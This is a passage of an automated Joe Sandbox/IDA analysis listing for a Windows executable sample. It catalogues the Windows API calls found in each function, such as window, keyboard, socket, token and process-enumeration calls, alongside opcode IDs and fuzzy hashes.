                                                      • Opcode Fuzzy Hash: 2d47457495f1445f25eb7ebaba668179780e44ac8fac2688904593ba1f7f4b1d
                                                      • Instruction Fuzzy Hash: 1E1103726002096BCF507F709CC6EEE3B6AAF84308F044075FD09DB292DE349909AB70
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FB58C1
                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FB58EE
                                                      • DrawMenuBar.USER32(?), ref: 00FB58FD
                                                      Strings
                                                      Similarity
                                                      • API ID: Menu$InfoItem$Draw
                                                      • String ID: 0
                                                      • API String ID: 3227129158-4108050209
                                                      • Opcode ID: 876035665f6c1728aff4f227d1b46c54f4de65fd194ca9face374acb03084ab9
                                                      • Instruction ID: c85b081b33abc79c9b942cfcc93583607a79f5f3ee367fa80f76552f6cd90314
                                                      • Opcode Fuzzy Hash: 876035665f6c1728aff4f227d1b46c54f4de65fd194ca9face374acb03084ab9
                                                      • Instruction Fuzzy Hash: D5012D32900218EFDB219F12DC44BEFBBB4FB45761F1480AAE849D6151DB348A98FF61
                                                      APIs
                                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00F7D3BF
                                                      • FreeLibrary.KERNEL32 ref: 00F7D3E5
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressFreeLibraryProc
                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                      • API String ID: 3013587201-2590602151
                                                      • Opcode ID: 0023f766e1770a11552e85e7351c16111b8110e26aca1ffbc20bf16d80d72c99
                                                      • Instruction ID: 59384c6db9de59c0e80402c6fd4611981b00f265c94482008312477aefb697f6
                                                      • Opcode Fuzzy Hash: 0023f766e1770a11552e85e7351c16111b8110e26aca1ffbc20bf16d80d72c99
                                                      • Instruction Fuzzy Hash: C8F05562C026258BD3B512118C94BAA3334AF00B15FDAC217F80EF2047EB60CC42FAD3
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e66758f2d4b5770836a214312bc36653604be74120a6acab9432e6ad9c57c793
                                                      • Instruction ID: 61c0f688673097a5b15de6bc862f2db0bc1dd209a21adb8d79aa91e13dd13dfd
                                                      • Opcode Fuzzy Hash: e66758f2d4b5770836a214312bc36653604be74120a6acab9432e6ad9c57c793
                                                      • Instruction Fuzzy Hash: C1C17C75A0020AEFDB54DFA4C888BAEB7B5FF48314F508598E405EB251CB71EE45EB90
                                                      APIs
                                                      Similarity
                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                      • String ID:
                                                      • API String ID: 1998397398-0
                                                      • Opcode ID: 044d056df400465abe5df9c46632205ae564ee8af512ef12691f382024bb0aaf
                                                      • Instruction ID: ab146a90ef010882046f86ae52cfe145086608ddc9f54b8ac239e45b0e17b945
                                                      • Opcode Fuzzy Hash: 044d056df400465abe5df9c46632205ae564ee8af512ef12691f382024bb0aaf
                                                      • Instruction Fuzzy Hash: A6A150B56043109FC700EF28C985E1AB7E5FF89724F088859F9899B361DB34ED01EB91
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00FBFC08,?), ref: 00F805F0
                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00FBFC08,?), ref: 00F80608
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00FBCC40,000000FF,?,00000000,00000800,00000000,?,00FBFC08,?), ref: 00F8062D
                                                      • _memcmp.LIBVCRUNTIME ref: 00F8064E
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID:
                                                      • API String ID: 314563124-0
                                                      • Opcode ID: cbe57b77aaa59d50b18c417ed032d5bde607f12e12a01ab954a188843bcc90fd
                                                      • Instruction ID: 0733798ed4e0ee34869b438ec8569ed704af9715824051480f0399dd8fd4b321
                                                      • Opcode Fuzzy Hash: cbe57b77aaa59d50b18c417ed032d5bde607f12e12a01ab954a188843bcc90fd
                                                      • Instruction Fuzzy Hash: 64812971A00109EFCB44DF94C988EEEB7B9FF89315F244558E506AB250DB71AE0ADF60
                                                      APIs
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 01f6e71a8165e9fbe9aadbc06bebd6c2a1acde1a74fac66ed536cedf6bf2950b
                                                      • Instruction ID: 5bd6e9a0985ae637c7e733ba45f818244450172fb9e6cce891be4e3b62978fc2
                                                      • Opcode Fuzzy Hash: 01f6e71a8165e9fbe9aadbc06bebd6c2a1acde1a74fac66ed536cedf6bf2950b
                                                      • Instruction Fuzzy Hash: 9D411931E00110ABDB25EBB98C467BE3AA4FF43370F1C4225F919D7292EA788D457761
                                                      APIs
                                                      • GetWindowRect.USER32(0120E990,?), ref: 00FB62E2
                                                      • ScreenToClient.USER32(?,?), ref: 00FB6315
                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00FB6382
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID:
                                                      • API String ID: 3880355969-0
                                                      • Opcode ID: eda33758a49b038b57b171361d316d1186f4fa0b2026bb4022b101d098e97e7a
                                                      • Instruction ID: 3677582099dda6e36bd24cc8c8f8e13adffa741bf7b18bb7060a207dc6540fb9
                                                      • Opcode Fuzzy Hash: eda33758a49b038b57b171361d316d1186f4fa0b2026bb4022b101d098e97e7a
                                                      • Instruction Fuzzy Hash: 8D512870A00209EFDB20DF59D8809AE7BB5EF45360F148269F915D7290D774AD41EF90
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00FA1AFD
                                                      • WSAGetLastError.WSOCK32 ref: 00FA1B0B
                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00FA1B8A
                                                      • WSAGetLastError.WSOCK32 ref: 00FA1B94
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$socket
                                                      • String ID:
                                                      • API String ID: 1881357543-0
                                                      • Opcode ID: 1605c2fa413186d552fcb6c1e9c86d500cddfef609a3d53e9b6d55175f777fd8
                                                      • Instruction ID: 9f73813840a5f09805867ff19e5ba7c518f9803edcc13322dd4cf22ce027652a
                                                      • Opcode Fuzzy Hash: 1605c2fa413186d552fcb6c1e9c86d500cddfef609a3d53e9b6d55175f777fd8
                                                      • Instruction Fuzzy Hash: D441E274600210AFE720EF20DC86F2A77E5AF89728F548448F91A9F7D2D776DD419BA0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b96f990d36ecb8449ab49a17b5a2ab9c690aa617da4a514dc3c769fa4df5307
                                                      • Instruction ID: ede0ed41c9fe0a1f4eec2d0cb2c0a7a5e41ba9eb3ff2ccfca38511f9bddeed8a
                                                      • Opcode Fuzzy Hash: 4b96f990d36ecb8449ab49a17b5a2ab9c690aa617da4a514dc3c769fa4df5307
                                                      • Instruction Fuzzy Hash: FB413C72A00304BFD724DF38CC41B6A7BE9EB88721F20462EFA05DB282D375A9059790
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F95783
                                                      • GetLastError.KERNEL32(?,00000000), ref: 00F957A9
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F957CE
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F957FA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      • Opcode ID: 8aad0bb1a769def303b1f9095d733ab133db954b3f1853797986c354a23a5da9
                                                      • Instruction ID: 3944275e0638e52db02e7e71ee04daf6ed3b656fd078d9104a5e996a321ef26d
                                                      • Opcode Fuzzy Hash: 8aad0bb1a769def303b1f9095d733ab133db954b3f1853797986c354a23a5da9
                                                      • Instruction Fuzzy Hash: 70412C35600610DFCF11EF55D945A5EBBE1AF89720B188488E84AAF366CB34FD00EF91
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00F46D71,00000000,00000000,00F482D9,?,00F482D9,?,00000001,00F46D71,8BE85006,00000001,00F482D9,00F482D9), ref: 00F5D910
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F5D999
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00F5D9AB
                                                      • __freea.LIBCMT ref: 00F5D9B4
                                                        • Part of subcall function 00F53820: RtlAllocateHeap.NTDLL(00000000,?,00FF1444,?,00F3FDF5,?,?,00F2A976,00000010,00FF1440,00F213FC,?,00F213C6,?,00F21129), ref: 00F53852
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                      • String ID:
                                                      • API String ID: 2652629310-0
                                                      • Opcode ID: 00993fddc9103398ce812935d6b2115da006e6dafc049de2c45c231cdedf1808
                                                      • Instruction ID: a05fa3b779f667a7cd9486da4c96aea1d0a75bfe2702d95fffe173dc79a504e2
                                                      • Opcode Fuzzy Hash: 00993fddc9103398ce812935d6b2115da006e6dafc049de2c45c231cdedf1808
                                                      • Instruction Fuzzy Hash: 4331D272A0120AABDF24DF64DC81EAF7BA5EB41321F050168FD04E7151EB35DD58EB90
                                                      APIs
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00FB5352
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FB5375
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FB5382
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00FB53A8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                      • String ID:
                                                      • API String ID: 3340791633-0
                                                      • Opcode ID: b7f7908a4768618e027f86a292cdc92ad410ffa4e07c3190a26bb969ecc4247f
                                                      • Instruction ID: 4a162210ad1b9d43c6a51225a14638253704fa15ccab636c834b3117099d5a37
                                                      • Opcode Fuzzy Hash: b7f7908a4768618e027f86a292cdc92ad410ffa4e07c3190a26bb969ecc4247f
                                                      • Instruction Fuzzy Hash: D031B031E55A0CEFEB309A56CC45BE937E7AB04BA0F5C4101BA11963E0C7B99980BF81
                                                      APIs
                                                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00F8ABF1
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F8AC0D
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F8AC74
                                                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00F8ACC6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 28496facd8f14c8df6164f4f90a9a1572f5dcab3b479e35aa75354e2e332fdc6
                                                      • Instruction ID: 37bf270aff8ea9e522842fb3cb1e0ef2435a507bb91301b3189e3df2f8e1b697
                                                      • Opcode Fuzzy Hash: 28496facd8f14c8df6164f4f90a9a1572f5dcab3b479e35aa75354e2e332fdc6
                                                      • Instruction Fuzzy Hash: D1310970E047186FFF35EB658C05BFA7BA5EB4A320F08431BE485521D1D375C985A792
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 00FB769A
                                                      • GetWindowRect.USER32(?,?), ref: 00FB7710
                                                      • PtInRect.USER32(?,?,00FB8B89), ref: 00FB7720
                                                      • MessageBeep.USER32(00000000), ref: 00FB778C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: 601fd80eddd1d0c6ff6118fcd77b90cb1577ba3fbec50c59962b01b8a66c475b
                                                      • Instruction ID: f3706a8832162b553a5519b063db00957e8316fc30385e22fb0e3b5da775efcd
                                                      • Opcode Fuzzy Hash: 601fd80eddd1d0c6ff6118fcd77b90cb1577ba3fbec50c59962b01b8a66c475b
                                                      • Instruction Fuzzy Hash: EF418D34A09318DFDB11EF5AC894EE9BBF5FF88310F2541A8E4159B261CB70A941EF90
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00FB16EB
                                                        • Part of subcall function 00F83A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F83A57
                                                        • Part of subcall function 00F83A3D: GetCurrentThreadId.KERNEL32 ref: 00F83A5E
                                                        • Part of subcall function 00F83A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F825B3), ref: 00F83A65
                                                      • GetCaretPos.USER32(?), ref: 00FB16FF
                                                      • ClientToScreen.USER32(00000000,?), ref: 00FB174C
                                                      • GetForegroundWindow.USER32 ref: 00FB1752
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: 562b113fb2c73c11024147c59ca9a635abeb601d88538c6bef81ea1a0ace999a
                                                      • Instruction ID: 4bcdaff091ab11d7c2eccfb12c635587e988b0295f729be7b4ce6a96b5890b07
                                                      • Opcode Fuzzy Hash: 562b113fb2c73c11024147c59ca9a635abeb601d88538c6bef81ea1a0ace999a
                                                      • Instruction Fuzzy Hash: 76315D75D00259AFCB00EFAAD881DEEBBF9EF48304B5080A9E415E7211DB359E45DFA0
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00F8D501
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00F8D50F
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00F8D52F
                                                      • CloseHandle.KERNEL32(00000000), ref: 00F8D5DC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 420147892-0
                                                      • Opcode ID: 0f01b80954539d4b1c6433e887860356d728ad8c4096ef2a531cf8b1f3e18b80
                                                      • Instruction ID: 9fabf39f9271f2b5651cf7c25d7cd472e5354df907497f9b0f0ec8d65cb34c08
                                                      • Opcode Fuzzy Hash: 0f01b80954539d4b1c6433e887860356d728ad8c4096ef2a531cf8b1f3e18b80
                                                      • Instruction Fuzzy Hash: 3231B1725083049FD300EF54DC81AAFBBF8EF99354F58092DF581971A1EB719948EBA2
                                                      APIs
                                                        • Part of subcall function 00F39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F39BB2
                                                      • GetCursorPos.USER32(?), ref: 00FB9001
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F77711,?,?,?,?,?), ref: 00FB9016
                                                      • GetCursorPos.USER32(?), ref: 00FB905E
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F77711,?,?,?), ref: 00FB9094
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                      • String ID:
                                                      • API String ID: 2864067406-0
                                                      • Opcode ID: 574ffd472e2afb79072c04a5116a4663903167812baefe12414bdb04c1cba940
                                                      • Instruction ID: 14d38d7d1689340823073fa26598df452f4275daaa84da43c505ce6df56e53cc
                                                      • Opcode Fuzzy Hash: 574ffd472e2afb79072c04a5116a4663903167812baefe12414bdb04c1cba940
                                                      • Instruction Fuzzy Hash: F4217C35A04018EFDB259FA5C898EFA7BB9EF8A3A0F044155FA0547261C3B19950FFA0
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,00FBCB68), ref: 00F8D2FB
                                                      • GetLastError.KERNEL32 ref: 00F8D30A
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F8D319
                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00FBCB68), ref: 00F8D376
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                      • String ID:
                                                      • API String ID: 2267087916-0
                                                      • Opcode ID: 75ecb29bc1b6014369cf540f31e9b0e89162ce9ac8bcc470fbb8dc4bb84cea04
                                                      • Instruction ID: 080b28fefb28f01f234f25d0ac533cb2f9e075caeea23b2f2d0a6de4df8247df
                                                      • Opcode Fuzzy Hash: 75ecb29bc1b6014369cf540f31e9b0e89162ce9ac8bcc470fbb8dc4bb84cea04
                                                      • Instruction Fuzzy Hash: A2219F709083019F8700EF28D8858AFB7E8AE9A368F544A1DF499C72E1D731D945EB93
                                                      APIs
                                                        • Part of subcall function 00F81014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F8102A
                                                        • Part of subcall function 00F81014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F81036
                                                        • Part of subcall function 00F81014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F81045
                                                        • Part of subcall function 00F81014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F8104C
                                                        • Part of subcall function 00F81014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F81062
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F815BE
                                                      • _memcmp.LIBVCRUNTIME ref: 00F815E1
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F81617
                                                      • HeapFree.KERNEL32(00000000), ref: 00F8161E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      • API String ID: 1592001646-0
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00FB280A
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FB2824
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FB2832
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00FB2840
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$AttributesLayered
                                                      • String ID:
                                                      • API String ID: 2169480361-0
                                                      APIs
                                                        • Part of subcall function 00F88D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00F8790A,?,000000FF,?,00F88754,00000000,?,0000001C,?,?), ref: 00F88D8C
                                                        • Part of subcall function 00F88D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00F88DB2
                                                        • Part of subcall function 00F88D7D: lstrcmpiW.KERNEL32(00000000,?,00F8790A,?,000000FF,?,00F88754,00000000,?,0000001C,?,?), ref: 00F88DE3
                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00F88754,00000000,?,0000001C,?,?,00000000), ref: 00F87923
                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00F87949
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F88754,00000000,?,0000001C,?,?,00000000), ref: 00F87984
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
